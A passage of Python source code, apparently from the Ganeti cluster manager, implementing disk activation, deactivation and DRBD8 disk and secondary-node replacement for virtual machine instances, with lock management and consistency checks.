raise errors.OpPrereqError("The iallocator and new node options can"
" only be used when changing the"
" secondary node", errors.ECODE_INVAL)
def ExpandNames(self):
self._ExpandAndLockInstance(allow_forthcoming=True)
assert locking.LEVEL_NODE not in self.needed_locks
assert locking.LEVEL_NODE_RES not in self.needed_locks
assert locking.LEVEL_NODEGROUP not in self.needed_locks
assert self.op.iallocator is None or self.op.remote_node is None, \
"Conflicting options"
if self.op.remote_node is not None:
(self.op.remote_node_uuid, self.op.remote_node) = \
ExpandNodeUuidAndName(self.cfg, self.op.remote_node_uuid,
self.op.remote_node)
# Warning: do not remove the locking of the new secondary here
# unless DRBD8Dev.AddChildren is changed to work in parallel;
# currently it doesn't since parallel invocations of
# FindUnusedMinor will conflict
self.needed_locks[locking.LEVEL_NODE] = [self.op.remote_node_uuid]
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_APPEND
else:
self.needed_locks[locking.LEVEL_NODE] = []
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_REPLACE
if self.op.iallocator is not None:
# iallocator will select a new node in the same group
self.needed_locks[locking.LEVEL_NODEGROUP] = []
self.needed_locks[locking.LEVEL_NODE_RES] = []
self.dont_collate_locks[locking.LEVEL_NODEGROUP] = True
self.dont_collate_locks[locking.LEVEL_NODE] = True
self.dont_collate_locks[locking.LEVEL_NODE_RES] = True
self.replacer = TLReplaceDisks(self, self.op.instance_uuid,
self.op.instance_name, self.op.mode,
self.op.iallocator, self.op.remote_node_uuid,
self.op.disks, self.op.early_release,
self.op.ignore_ipolicy)
self.tasklets = [self.replacer]
def DeclareLocks(self, level):
if level == locking.LEVEL_NODEGROUP:
assert self.op.remote_node_uuid is None
assert self.op.iallocator is not None
assert not self.needed_locks[locking.LEVEL_NODEGROUP]
self.share_locks[locking.LEVEL_NODEGROUP] = 1
# Lock all groups used by instance optimistically; this requires going
# via the node before it's locked, requiring verification later on
self.needed_locks[locking.LEVEL_NODEGROUP] = \
self.cfg.GetInstanceNodeGroups(self.op.instance_uuid)
elif level == locking.LEVEL_NODE:
if self.op.iallocator is not None:
assert self.op.remote_node_uuid is None
assert not self.needed_locks[locking.LEVEL_NODE]
# Lock member nodes of all locked groups
self.needed_locks[locking.LEVEL_NODE] = \
[node_uuid
for group_uuid in self.owned_locks(locking.LEVEL_NODEGROUP)
for node_uuid in self.cfg.GetNodeGroup(group_uuid).members]
else:
self._LockInstancesNodes()
elif level == locking.LEVEL_NODE_RES:
# Reuse node locks
self.needed_locks[locking.LEVEL_NODE_RES] = \
self.needed_locks[locking.LEVEL_NODE]
def BuildHooksEnv(self):
"""Build hooks env.
This runs on the master, the primary and all the secondaries.
"""
instance = self.replacer.instance
secondary_nodes = self.cfg.GetInstanceSecondaryNodes(instance.uuid)
env = {
"MODE": self.op.mode,
"NEW_SECONDARY": self.op.remote_node,
"OLD_SECONDARY": self.cfg.GetNodeName(secondary_nodes[0]),
}
env.update(BuildInstanceHookEnvByObject(self, instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
instance = self.replacer.instance
nl = [
self.cfg.GetMasterNode(),
instance.primary_node,
]
if self.op.remote_node_uuid is not None:
nl.append(self.op.remote_node_uuid)
return nl, nl
def CheckPrereq(self):
"""Check prerequisites.
"""
# Verify if node group locks are still correct
owned_groups = self.owned_locks(locking.LEVEL_NODEGROUP)
if owned_groups:
CheckInstanceNodeGroups(self.cfg, self.op.instance_uuid, owned_groups)
return LogicalUnit.CheckPrereq(self)
class LUInstanceActivateDisks(NoHooksLU):
"""Bring up an instance's disks.
"""
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
self.needed_locks[locking.LEVEL_NODE] = []
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_REPLACE
def DeclareLocks(self, level):
if level == locking.LEVEL_NODE:
self._LockInstancesNodes()
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckNodeOnline(self, self.instance.primary_node)
def Exec(self, feedback_fn):
"""Activate the disks.
"""
disks_ok, disks_info, _ = AssembleInstanceDisks(
self, self.instance, ignore_size=self.op.ignore_size)
if not disks_ok:
raise errors.OpExecError("Cannot activate block devices")
if self.op.wait_for_sync:
if not WaitForSync(self, self.instance):
self.cfg.MarkInstanceDisksInactive(self.instance.uuid)
raise errors.OpExecError("Some disks of the instance are degraded!")
return disks_info
class LUInstanceDeactivateDisks(NoHooksLU):
"""Shutdown an instance's disks.
"""
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
self.needed_locks[locking.LEVEL_NODE] = []
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_REPLACE
def DeclareLocks(self, level):
if level == locking.LEVEL_NODE:
self._LockInstancesNodes()
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
def Exec(self, feedback_fn):
"""Deactivate the disks
"""
if self.op.force:
ShutdownInstanceDisks(self, self.instance)
else:
_SafeShutdownInstanceDisks(self, self.instance)
def _CheckDiskConsistencyInner(lu, instance, dev, node_uuid, on_primary,
ldisk=False):
"""Check that mirrors are not degraded.
@attention: The device has to be annotated already.
The ldisk parameter, if True, will change the test from the
is_degraded attribute (which represents overall non-ok status for
the device(s)) to the ldisk (representing the local storage status).
"""
result = True
if on_primary or dev.AssembleOnSecondary():
rstats = lu.rpc.call_blockdev_find(node_uuid, (dev, instance))
msg = rstats.fail_msg
if msg:
lu.LogWarning("Can't find disk on node %s: %s",
lu.cfg.GetNodeName(node_uuid), msg)
result = False
elif not rstats.payload:
lu.LogWarning("Can't find disk on node %s", lu.cfg.GetNodeName(node_uuid))
result = False
else:
if ldisk:
result = result and rstats.payload.ldisk_status == constants.LDS_OKAY
else:
result = result and not rstats.payload.is_degraded
if dev.children:
for child in dev.children:
result = result and _CheckDiskConsistencyInner(lu, instance, child,
node_uuid, on_primary)
return result
def CheckDiskConsistency(lu, instance, dev, node_uuid, on_primary, ldisk=False):
"""Wrapper around L{_CheckDiskConsistencyInner}.
"""
(disk,) = AnnotateDiskParams(instance, [dev], lu.cfg)
return _CheckDiskConsistencyInner(lu, instance, disk, node_uuid, on_primary,
ldisk=ldisk)
def _BlockdevFind(lu, node_uuid, dev, instance):
"""Wrapper around call_blockdev_find to annotate diskparams.
@param lu: A reference to the lu object
@param node_uuid: The node to call out
@param dev: The device to find
@param instance: The instance object the device belongs to
@returns The result of the rpc call
"""
(disk,) = AnnotateDiskParams(instance, [dev], lu.cfg)
return lu.rpc.call_blockdev_find(node_uuid, (disk, instance))
def _GenerateUniqueNames(lu, exts):
"""Generate a suitable LV name.
This will generate a logical volume name for the given instance.
"""
results = []
for val in exts:
new_id = lu.cfg.GenerateUniqueID(lu.proc.GetECId())
results.append("%s%s" % (new_id, val))
return results
class TLReplaceDisks(Tasklet):
"""Replaces disks for an instance.
Note: Locking is not within the scope of this class.
"""
def __init__(self, lu, instance_uuid, instance_name, mode, iallocator_name,
remote_node_uuid, disks, early_release, ignore_ipolicy):
"""Initializes this class.
"""
Tasklet.__init__(self, lu)
# Parameters
self.instance_uuid = instance_uuid
self.instance_name = instance_name
self.mode = mode
self.iallocator_name = iallocator_name
self.remote_node_uuid = remote_node_uuid
self.disks = disks
self.early_release = early_release
self.ignore_ipolicy = ignore_ipolicy
# Runtime data
self.instance = None
self.new_node_uuid = None
self.target_node_uuid = None
self.other_node_uuid = None
self.remote_node_info = None
self.node_secondary_ip = None
@staticmethod
def _RunAllocator(lu, iallocator_name, instance_uuid,
relocate_from_node_uuids):
"""Compute a new secondary node using an IAllocator.
"""
req = iallocator.IAReqRelocate(
inst_uuid=instance_uuid,
relocate_from_node_uuids=list(relocate_from_node_uuids))
ial = iallocator.IAllocator(lu.cfg, lu.rpc, req)
ial.Run(iallocator_name)
if not ial.success:
raise errors.OpPrereqError("Can't compute nodes using iallocator '%s':"
" %s" % (iallocator_name, ial.info),
errors.ECODE_NORES)
remote_node_name = ial.result[0] # pylint: disable=E1136
remote_node = lu.cfg.GetNodeInfoByName(remote_node_name)
if remote_node is None:
raise errors.OpPrereqError("Node %s not found in configuration" %
remote_node_name, errors.ECODE_NOENT)
lu.LogInfo("Selected new secondary for instance '%s': %s",
instance_uuid, remote_node_name)
return remote_node.uuid
def _FindFaultyDisks(self, node_uuid):
"""Wrapper for L{FindFaultyInstanceDisks}.
"""
return FindFaultyInstanceDisks(self.cfg, self.rpc, self.instance,
node_uuid, True)
def _CheckDisksActivated(self, instance):
"""Checks if the instance disks are activated.
@param instance: The instance to check disks
@return: True if they are activated, False otherwise
"""
node_uuids = self.cfg.GetInstanceNodes(instance.uuid)
for idx, dev in enumerate(self.cfg.GetInstanceDisks(instance.uuid)):
for node_uuid in node_uuids:
self.lu.LogInfo("Checking disk/%d on %s", idx,
self.cfg.GetNodeName(node_uuid))
result = _BlockdevFind(self, node_uuid, dev, instance)
if result.offline:
continue
elif result.fail_msg or not result.payload:
return False
return True
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.instance_name
secondary_nodes = self.cfg.GetInstanceSecondaryNodes(self.instance.uuid)
if len(secondary_nodes) != 1:
raise errors.OpPrereqError("The instance has a strange layout,"
" expected one secondary but found %d" %
len(secondary_nodes),
errors.ECODE_FAULT)
secondary_node_uuid = secondary_nodes[0]
if self.iallocator_name is None:
remote_node_uuid = self.remote_node_uuid
else:
remote_node_uuid = self._RunAllocator(self.lu, self.iallocator_name,
self.instance.uuid,
secondary_nodes)
if remote_node_uuid is None:
self.remote_node_info = None
else:
assert remote_node_uuid in self.lu.owned_locks(locking.LEVEL_NODE), \
"Remote node '%s' is not locked" % remote_node_uuid
self.remote_node_info = self.cfg.GetNodeInfo(remote_node_uuid)
assert self.remote_node_info is not None, \
"Cannot retrieve locked node %s" % remote_node_uuid
if remote_node_uuid == self.instance.primary_node:
raise errors.OpPrereqError("The specified node is the primary node of"
" the instance", errors.ECODE_INVAL)
if remote_node_uuid == secondary_node_uuid:
raise errors.OpPrereqError("The specified node is already the"
" secondary node of the instance",
errors.ECODE_INVAL)
if self.disks and self.mode in (constants.REPLACE_DISK_AUTO,
constants.REPLACE_DISK_CHG):
raise errors.OpPrereqError("Cannot specify disks to be replaced",
errors.ECODE_INVAL)
if self.mode == constants.REPLACE_DISK_AUTO:
if not self._CheckDisksActivated(self.instance):
raise errors.OpPrereqError("Please run activate-disks on instance %s"
" first" % self.instance_name,
errors.ECODE_STATE)
faulty_primary = self._FindFaultyDisks(self.instance.primary_node)
faulty_secondary = self._FindFaultyDisks(secondary_node_uuid)
if faulty_primary and faulty_secondary:
raise errors.OpPrereqError("Instance %s has faulty disks on more than"
" one node and can not be repaired"
" automatically" % self.instance_name,
errors.ECODE_STATE)
if faulty_primary:
self.disks = faulty_primary
self.target_node_uuid = self.instance.primary_node
self.other_node_uuid = secondary_node_uuid
check_nodes = [self.target_node_uuid, self.other_node_uuid]
elif faulty_secondary:
self.disks = faulty_secondary
self.target_node_uuid = secondary_node_uuid
self.other_node_uuid = self.instance.primary_node
check_nodes = [self.target_node_uuid, self.other_node_uuid]
else:
self.disks = []
check_nodes = []
else:
# Non-automatic modes
if self.mode == constants.REPLACE_DISK_PRI:
self.target_node_uuid = self.instance.primary_node
self.other_node_uuid = secondary_node_uuid
check_nodes = [self.target_node_uuid, self.other_node_uuid]
elif self.mode == constants.REPLACE_DISK_SEC:
self.target_node_uuid = secondary_node_uuid
self.other_node_uuid = self.instance.primary_node
check_nodes = [self.target_node_uuid, self.other_node_uuid]
elif self.mode == constants.REPLACE_DISK_CHG:
self.new_node_uuid = remote_node_uuid
self.other_node_uuid = self.instance.primary_node
self.target_node_uuid = secondary_node_uuid
check_nodes = [self.new_node_uuid, self.other_node_uuid]
CheckNodeNotDrained(self.lu, remote_node_uuid)
CheckNodeVmCapable(self.lu, remote_node_uuid)
old_node_info = self.cfg.GetNodeInfo(secondary_node_uuid)
assert old_node_info is not None
if old_node_info.offline and not self.early_release:
# doesn't make sense to delay the release
self.early_release = True
self.lu.LogInfo("Old secondary %s is offline, automatically enabling"
" early-release mode", secondary_node_uuid)
else:
raise errors.ProgrammerError("Unhandled disk replace mode (%s)" %
self.mode)
# If not specified all disks should be replaced
if not self.disks:
self.disks = range(len(self.instance.disks))
disks = self.cfg.GetInstanceDisks(self.instance.uuid)
if (not disks or
not utils.AllDiskOfType(disks, [constants.DT_DRBD8])):
raise errors.OpPrereqError("Can only run replace disks for DRBD8-based"
" instances", errors.ECODE_INVAL)
# TODO: This is ugly, but right now we can't distinguish between internal
# submitted opcode and external one. We should fix that.
if self.remote_node_info:
# We change the node, lets verify it still meets instance policy
new_group_info = self.cfg.GetNodeGroup(self.remote_node_info.group)
cluster = self.cfg.GetClusterInfo()
ipolicy = ganeti.masterd.instance.CalculateGroupIPolicy(cluster,
new_group_info)
CheckTargetNodeIPolicy(self.lu, ipolicy, self.instance,
self.remote_node_info, self.cfg,
ignore=self.ignore_ipolicy)
for node_uuid in check_nodes:
CheckNodeOnline(self.lu, node_uuid)
touched_nodes = frozenset(node_uuid for node_uuid in [self.new_node_uuid,
self.other_node_uuid,
self.target_node_uuid]
if node_uuid is not None)
# Release unneeded node and node resource locks
ReleaseLocks(self.lu, locking.LEVEL_NODE, keep=touched_nodes)
ReleaseLocks(self.lu, locking.LEVEL_NODE_RES, keep=touched_nodes)
# Release any owned node group
ReleaseLocks(self.lu, locking.LEVEL_NODEGROUP)
# Check whether disks are valid
for disk_idx in self.disks:
self.instance.FindDisk(disk_idx)
# Get secondary node IP addresses
self.node_secondary_ip = dict((uuid, node.secondary_ip) for (uuid, node)
in self.cfg.GetMultiNodeInfo(touched_nodes))
def Exec(self, feedback_fn):
"""Execute disk replacement.
This dispatches the disk replacement to the appropriate handler.
"""
if __debug__:
# Verify owned locks before starting operation
owned_nodes = self.lu.owned_locks(locking.LEVEL_NODE)
assert set(owned_nodes) == set(self.node_secondary_ip), \
("Incorrect node locks, owning %s, expected %s" %
(owned_nodes, self.node_secondary_ip.keys()))
assert (self.lu.owned_locks(locking.LEVEL_NODE) ==
self.lu.owned_locks(locking.LEVEL_NODE_RES))
owned_instances = self.lu.owned_locks(locking.LEVEL_INSTANCE)
assert list(owned_instances) == [self.instance_name], \
"Instance '%s' not locked" % self.instance_name
if not self.disks:
feedback_fn("No disks need replacement for instance '%s'" %
self.instance.name)
return
feedback_fn("Replacing disk(s) %s for instance '%s'" %
(utils.CommaJoin(self.disks), self.instance.name))
feedback_fn("Current primary node: %s" %
self.cfg.GetNodeName(self.instance.primary_node))
secondary_nodes = self.cfg.GetInstanceSecondaryNodes(self.instance.uuid)
feedback_fn("Current secondary node: %s" %
utils.CommaJoin(self.cfg.GetNodeNames(secondary_nodes)))
activate_disks = not self.instance.disks_active
# Activate the instance disks if we're replacing them on a down instance
# that is real (forthcoming instances currently only have forthcoming
# disks).
if activate_disks and not self.instance.forthcoming:
StartInstanceDisks(self.lu, self.instance, True)
# Re-read the instance object modified by the previous call
self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)
try:
# Should we replace the secondary node?
if self.new_node_uuid is not None:
fn = self._ExecDrbd8Secondary
else:
fn = self._ExecDrbd8DiskOnly
result = fn(feedback_fn)
finally:
# Deactivate the instance disks if we're replacing them on a
# down instance
if activate_disks and not self.instance.forthcoming:
_SafeShutdownInstanceDisks(self.lu, self.instance,
req_states=INSTANCE_NOT_RUNNING)
self.lu.AssertReleasedLocks(locking.LEVEL_NODE)
if __debug__:
# Verify owned locks
owned_nodes = self.lu.owned_locks(locking.LEVEL_NODE_RES)
nodes = frozenset(self.node_secondary_ip)
assert ((self.early_release and not owned_nodes) or
(not self.early_release and not (set(owned_nodes) - nodes))), \
("Not owning the correct locks, early_release=%s, owned=%r,"
" nodes=%r" % (self.early_release, owned_nodes, nodes))
return result
def _CheckVolumeGroup(self, node_uuids):
self.lu.LogInfo("Checking volume groups")
vgname = self.cfg.GetVGName()
# Make sure volume group exists on all involved nodes
results = self.rpc.call_vg_list(node_uuids)
if not results:
raise errors.OpExecError("Can't list volume groups on the nodes")
for node_uuid in node_uuids:
res = results[node_uuid]
res.Raise("Error checking node %s" % self.cfg.GetNodeName(node_uuid))
if vgname not in res.payload:
raise errors.OpExecError("Volume group '%s' not found on node %s" %
(vgname, self.cfg.GetNodeName(node_uuid)))
def _CheckDisksExistence(self, node_uuids):
# Check disk existence
for idx, dev in enumerate(self.cfg.GetInstanceDisks(self.instance.uuid)):
if idx not in self.disks:
continue
for node_uuid in node_uuids:
self.lu.LogInfo("Checking disk/%d on %s", idx,
self.cfg.GetNodeName(node_uuid))
result = _BlockdevFind(self, node_uuid, dev, self.instance)
msg = result.fail_msg
if msg or not result.payload:
if not msg:
msg = "disk not found"
if not self._CheckDisksActivated(self.instance):
extra_hint = ("\nDisks seem to be not properly activated. Try"
" running activate-disks on the instance before"
" using replace-disks.")
else:
extra_hint = ""
raise errors.OpExecError("Can't find disk/%d on node %s: %s%s" %
(idx, self.cfg.GetNodeName(node_uuid), msg,
extra_hint))
def _CheckDisksConsistency(self, node_uuid, on_primary, ldisk):
for idx, dev in enumerate(self.cfg.GetInstanceDisks(self.instance.uuid)):
if idx not in self.disks:
continue
self.lu.LogInfo("Checking disk/%d consistency on node %s" %
(idx, self.cfg.GetNodeName(node_uuid)))
if not CheckDiskConsistency(self.lu, self.instance, dev, node_uuid,
on_primary, ldisk=ldisk):
raise errors.OpExecError("Node %s has degraded storage, unsafe to"
" replace disks for instance %s" %
(self.cfg.GetNodeName(node_uuid),
self.instance.name))
def _CreateNewStorage(self, node_uuid):
"""Create new storage on the primary or secondary node.
This is only used for same-node replaces, not for changing the
secondary node, hence we don't want to modify the existing disk.
"""
iv_names = {}
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
disks = AnnotateDiskParams(self.instance, inst_disks, self.cfg)
for idx, dev in enumerate(disks):
if idx not in self.disks:
continue
self.lu.LogInfo("Adding storage on %s for disk/%d",
self.cfg.GetNodeName(node_uuid), idx)
lv_names = [".disk%d_%s" % (idx, suffix) for suffix in ["data", "meta"]]
names = _GenerateUniqueNames(self.lu, lv_names)
(data_disk, meta_disk) = dev.children
vg_data = data_disk.logical_id[0]
lv_data = objects.Disk(dev_type=constants.DT_PLAIN, size=dev.size,
logical_id=(vg_data, names[0]),
params=data_disk.params)
vg_meta = meta_disk.logical_id[0]
lv_meta = objects.Disk(dev_type=constants.DT_PLAIN,
size=constants.DRBD_META_SIZE,
logical_id=(vg_meta, names[1]),
params=meta_disk.params)
new_lvs = [lv_data, lv_meta]
old_lvs = [child.Copy() for child in dev.children]
iv_names[dev.iv_name] = (dev, old_lvs, new_lvs)
excl_stor = IsExclusiveStorageEnabledNodeUuid(self.lu.cfg, node_uuid)
# we pass force_create=True to force the LVM creation
for new_lv in new_lvs:
try:
_CreateBlockDevInner(self.lu, node_uuid, self.instance, new_lv, True,
GetInstanceInfoText(self.instance), False,
excl_stor)
except errors.DeviceCreationError, e:
raise errors.OpExecError("Can't create block device: %s" % e.message)
return iv_names
def _CheckDevices(self, node_uuid, iv_names):
for name, (dev, _, _) in iv_names.iteritems():
result = _BlockdevFind(self, node_uuid, dev, self.instance)
msg = result.fail_msg
if msg or not result.payload:
if not msg:
msg = "disk not found"
raise errors.OpExecError("Can't find DRBD device %s: %s" %
(name, msg))
if result.payload.is_degraded:
raise errors.OpExecError("DRBD device %s is degraded!" % name)
def _RemoveOldStorage(self, node_uuid, iv_names):
for name, (_, old_lvs, _) in iv_names.iteritems():
self.lu.LogInfo("Remove logical volumes for %s", name)
for lv in old_lvs:
msg = self.rpc.call_blockdev_remove(node_uuid, (lv, self.instance)) \
.fail_msg
if msg:
self.lu.LogWarning("Can't remove old LV: %s", msg,
hint="remove unused LVs manually")
def _ExecDrbd8DiskOnly(self, feedback_fn): # pylint: disable=W0613
"""Replace a disk on the primary or secondary for DRBD 8.
The algorithm for replace is quite complicated:
1. for each disk to be replaced:
1. create new LVs on the target node with unique names
1. detach old LVs from the drbd device
1. rename old LVs to name_replaced.<time_t>
1. rename new LVs to old LVs
1. attach the new LVs (with the old names now) to the drbd device
1. wait for sync across all devices
1. for each modified disk:
1. remove old LVs (which have the name name_replaces.<time_t>)
Failures are not very well handled.
"""
steps_total = 6
if self.instance.forthcoming:
feedback_fn("Instance forthcoming, not touching disks")
return
# Step: check device activation
self.lu.LogStep(1, steps_total, "Check device existence")
self._CheckDisksExistence([self.other_node_uuid, self.target_node_uuid])
self._CheckVolumeGroup([self.target_node_uuid, self.other_node_uuid])
# Step: check other node consistency
self.lu.LogStep(2, steps_total, "Check peer consistency")
self._CheckDisksConsistency(
self.other_node_uuid, self.other_node_uuid == self.instance.primary_node,
False)
# Step: create new storage
self.lu.LogStep(3, steps_total, "Allocate new storage")
iv_names = self._CreateNewStorage(self.target_node_uuid)
# Step: for each lv, detach+rename*2+attach
self.lu.LogStep(4, steps_total, "Changing drbd configuration")
for dev, old_lvs, new_lvs in iv_names.itervalues():
self.lu.LogInfo("Detaching %s drbd from local storage", dev.iv_name)
result = self.rpc.call_blockdev_removechildren(self.target_node_uuid,
(dev, self.instance),
(old_lvs, self.instance))
result.Raise("Can't detach drbd from local storage on node"
" %s for device %s" %
(self.cfg.GetNodeName(self.target_node_uuid), dev.iv_name))
#dev.children = []
#cfg.Update(instance)
# ok, we created the new LVs, so now we know we have the needed
# storage; as such, we proceed on the target node to rename
# old_lv to _old, and new_lv to old_lv; note that we rename LVs
# using the assumption that logical_id == unique_id on that node
# FIXME(iustin): use a better name for the replaced LVs
temp_suffix = int(time.time())
ren_fn = lambda d, suff: (d.logical_id[0],
d.logical_id[1] + "_replaced-%s" % suff)
# Build the rename list based on what LVs exist on the node
rename_old_to_new = []
for to_ren in old_lvs:
result = self.rpc.call_blockdev_find(self.target_node_uuid,
(to_ren, self.instance))
if not result.fail_msg and result.payload:
# device exists
rename_old_to_new.append((to_ren, ren_fn(to_ren, temp_suffix)))
self.lu.LogInfo("Renaming the old LVs on the target node")
result = self.rpc.call_blockdev_rename(self.target_node_uuid,
rename_old_to_new)
result.Raise("Can't rename old LVs on node %s" %
self.cfg.GetNodeName(self.target_node_uuid))
# Now we rename the new LVs to the old LVs
self.lu.LogInfo("Renaming the new LVs on the target node")
rename_new_to_old = [(new, old.logical_id)
for old, new in zip(old_lvs, new_lvs)]
result = self.rpc.call_blockdev_rename(self.target_node_uuid,
rename_new_to_old)
result.Raise("Can't rename new LVs on node %s" %
self.cfg.GetNodeName(self.target_node_uuid))
# Intermediate steps of in memory modifications
for old, new in zip(old_lvs, new_lvs):
new.logical_id = old.logical_id
# We need to modify old_lvs so that removal later removes the
# right LVs, not the newly added ones; note that old_lvs is a
# copy here
for disk in old_lvs:
disk.logical_id = ren_fn(disk, temp_suffix)
# Now that the new lvs have the old name, we can add them to the device
self.lu.LogInfo("Adding new mirror component on %s",
self.cfg.GetNodeName(self.target_node_uuid))
result = self.rpc.call_blockdev_addchildren(self.target_node_uuid,
(dev, self.instance),
(new_lvs, self.instance))
msg = result.fail_msg
if msg:
for new_lv in new_lvs:
msg2 = self.rpc.call_blockdev_remove(self.target_node_uuid,
(new_lv, self.instance)).fail_msg
if msg2:
self.lu.LogWarning("Can't rollback device %s: %s", dev, msg2,
hint=("cleanup manually the unused logical"
"volumes"))
raise errors.OpExecError("Can't add local storage to drbd: %s" % msg)
cstep = itertools.count(5)
if self.early_release:
self.lu.LogStep(cstep.next(), steps_total, "Removing old storage")
self._RemoveOldStorage(self.target_node_uuid, iv_names)
# TODO: Check if releasing locks early still makes sense
ReleaseLocks(self.lu, locking.LEVEL_NODE_RES)
else:
# Release all resource locks except those used by the instance
ReleaseLocks(self.lu, locking.LEVEL_NODE_RES,
keep=self.node_secondary_ip.keys())
# Release all node locks while waiting for sync
ReleaseLocks(self.lu, locking.LEVEL_NODE)
# TODO: Can the instance lock be downgraded here? Take the optional disk
# shutdown in the caller into consideration.
# Wait for sync
# This can fail as the old devices are degraded and _WaitForSync
# does a combined result over all disks, so we don't check its return value
self.lu.LogStep(cstep.next(), steps_total, "Sync devices")
WaitForSync(self.lu, self.instance)
# Check all devices manually
self._CheckDevices(self.instance.primary_node, iv_names)
# Step: remove old storage
if not self.early_release:
self.lu.LogStep(cstep.next(), steps_total, "Removing old storage")
self._RemoveOldStorage(self.target_node_uuid, iv_names)
def _UpdateDisksSecondary(self, iv_names, feedback_fn):
"""Update the configuration of disks to have a new secondary.
@param iv_names: iterable of triples for all volumes of the instance.
The first component has to be the device and the third the logical
id.
@param feedback_fn: function to used send feedback back to the caller of
the OpCode
"""
self.lu.LogInfo("Updating instance configuration")
for dev, _, new_logical_id in iv_names.itervalues():
dev.logical_id = new_logical_id
self.cfg.Update(dev, feedback_fn)
self.cfg.SetDiskNodes(dev.uuid, [self.instance.primary_node,
self.new_node_uuid])
self.cfg.Update(self.instance, feedback_fn)
def _ExecDrbd8Secondary(self, feedback_fn):
"""Replace the secondary node for DRBD 8.
The algorithm for replace is quite complicated:
- for all disks of the instance:
- create new LVs on the new node with same names
- shutdown the drbd device on the old secondary
- disconnect the drbd network on the primary
- create the drbd device on the new secondary
- network attach the drbd on the primary, using an artifice:
the drbd code for Attach() will connect to the network if it
finds a device which is connected to the good local disks but
not network enabled
- wait for sync across all devices
- remove all disks from the old secondary
Failures are not very well handled.
"""
if self.instance.forthcoming:
feedback_fn("Instance fortcoming, will only update the configuration")
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
minors = self.cfg.AllocateDRBDMinor([self.new_node_uuid
for _ in inst_disks],
self.instance.uuid)
logging.debug("Allocated minors %r", minors)
iv_names = {}
for idx, (dev, new_minor) in enumerate(zip(inst_disks, minors)):
(o_node1, _, o_port, o_minor1, o_minor2, o_secret) = \
dev.logical_id
if self.instance.primary_node == o_node1:
p_minor = o_minor1
else:
p_minor = o_minor2
new_net_id = (self.instance.primary_node, self.new_node_uuid, o_port,
p_minor, new_minor, o_secret)
iv_names[idx] = (dev, dev.children, new_net_id)
logging.debug("Allocated new_minor: %s, new_logical_id: %s", new_minor,
new_net_id)
self._UpdateDisksSecondary(iv_names, feedback_fn)
ReleaseLocks(self.lu, locking.LEVEL_NODE)
return
steps_total = 6
pnode = self.instance.primary_node
# Step: check device activation
self.lu.LogStep(1, steps_total, "Check device existence")
self._CheckDisksExistence([self.instance.primary_node])
self._CheckVolumeGroup([self.instance.primary_node])
# Step: check other node consistency
self.lu.LogStep(2, steps_total, "Check peer consistency")
self._CheckDisksConsistency(self.instance.primary_node, True, True)
# Step: create new storage
self.lu.LogStep(3, steps_total, "Allocate new storage")
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
disks = AnnotateDiskParams(self.instance, inst_disks, self.cfg)
excl_stor = IsExclusiveStorageEnabledNodeUuid(self.lu.cfg,
self.new_node_uuid)
for idx, dev in enumerate(disks):
self.lu.LogInfo("Adding new local storage on %s for disk/%d" %
(self.cfg.GetNodeName(self.new_node_uuid), idx))
# we pass force_create=True to force LVM creation
for new_lv in dev.children:
try:
_CreateBlockDevInner(self.lu, self.new_node_uuid, self.instance,
new_lv, True, GetInstanceInfoText(self.instance),
False, excl_stor)
except errors.DeviceCreationError, e:
raise errors.OpExecError("Can't create block device: %s" % e.message)
# Step 4: dbrd minors and drbd setups changes
# after this, we must manually remove the drbd minors on both the
# error and the success paths
self.lu.LogStep(4, steps_total, "Changing drbd configuration")
minors = []
for disk in inst_disks:
minor = self.cfg.AllocateDRBDMinor([self.new_node_uuid], disk.uuid)
minors.append(minor[0])
logging.debug("Allocated minors %r", minors)
iv_names = {}
for idx, (dev, new_minor) in enumerate(zip(inst_disks, minors)):
self.lu.LogInfo("activating a new drbd on %s for disk/%d" %
(self.cfg.GetNodeName(self.new_node_uuid), idx))
# create new devices on new_node; note that we create two IDs:
# one without port, so the drbd will be activated without
# networking information on the new node at this stage, and one
# with network, for the latter activation in step 4
(o_node1, o_node2, o_port, o_minor1, o_minor2, o_secret) = dev.logical_id
if self.instance.primary_node == o_node1:
p_minor = o_minor1
else:
assert self.instance.primary_node == o_node2, "Three-node instance?"
p_minor = o_minor2
new_alone_id = (self.instance.primary_node, self.new_node_uuid, None,
p_minor, new_minor, o_secret)
new_net_id = (self.instance.primary_node, self.new_node_uuid, o_port,
p_minor, new_minor, o_secret)
iv_names[idx] = (dev, dev.children, new_net_id)
logging.debug("Allocated new_minor: %s, new_logical_id: %s", new_minor,
new_net_id)
new_drbd = objects.Disk(dev_type=constants.DT_DRBD8,
logical_id=new_alone_id,
children=dev.children,
size=dev.size,
params={})
(anno_new_drbd,) = AnnotateDiskParams(self.instance, [new_drbd],
self.cfg)
try:
CreateSingleBlockDev(self.lu, self.new_node_uuid, self.instance,
anno_new_drbd,
GetInstanceInfoText(self.instance), False,
excl_stor)
except errors.GenericError:
for disk in inst_disks:
self.cfg.ReleaseDRBDMinors(disk.uuid)
raise
# We have new devices, shutdown the drbd on the old secondary
for idx, dev in enumerate(inst_disks):
self.lu.LogInfo("Shutting down drbd for disk/%d on old node", idx)
msg = self.rpc.call_blockdev_shutdown(self.target_node_uuid,
(dev, self.instance)).fail_msg
if msg:
self.lu.LogWarning("Failed to shutdown drbd for disk/%d on old"
"node: %s" % (idx, msg),
hint=("Please cleanup this device manually as"
" soon as possible"))
